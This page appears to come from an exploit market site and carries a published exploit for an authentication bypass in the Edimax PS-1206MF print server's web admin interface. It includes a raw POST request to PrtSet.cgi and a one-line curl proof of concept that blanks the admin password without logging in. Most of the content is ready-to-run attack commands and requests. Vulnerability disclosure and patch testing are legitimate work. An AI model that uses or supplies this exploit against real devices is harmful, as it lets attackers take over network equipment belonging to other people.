[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Edimax PS-1206MF - Web Admin Auth Bypass Vulnerability

Author
Smash_
Risk
[
Security Risk High
]
0day-ID
0day-ID-24169
Category
web applications
Date add
30-08-2015
Platform
hardware
# Title: Edimax PS-1206MF - Web Admin Auth Bypass
# Date: 30.08.15
# Vendor: edimax.com
# Firmware version: 4.8.25
# Author: Smash_
# Contact: smash [at] devilteam.pl


HTTP authorization is not being properly verified while sendind POST requests to .cgi, remote attacker is able to change specific settings or even reset admin password.

By default, it is necessary to know current password in order to change it, but when request will be missing POST anewpass & confpass parameters, admin password will be set to null.

devil@hell:~$ curl -gi http://192.168.0.10/
HTTP/1.1 401 
Date: Sat, 21 Dec 1996 12:00:00 GMT
WWW-Authenticate: Basic realm="Default password:1234"

401 Unauthorized - User authentication is required.

Request:
POST /PrtSet.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/pssystem.htm
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

BoxName=MFD55329&anewpass=1234&confpass=1234&PSPORTNAME1=&PSPORTNAME2=&PSPORTNAME3=&save.x=47&save.y=11

Response:
HTTP/1.1 200 OK
Date: Sat, 21 Dec 1996 12:00:00 GMT
Content-type: text/html

<html><head><title>Advance Settings</title><link rel="stylesheet" href="set.css"></head>
(...)


Following curl request will set admin account with empty password.

PoC:
devil@hell:~$ curl -XPOST --data "" -s http://192.168.0.10/PrtSet.cgi > /dev/null

#  0day.today [2024-12-25]  #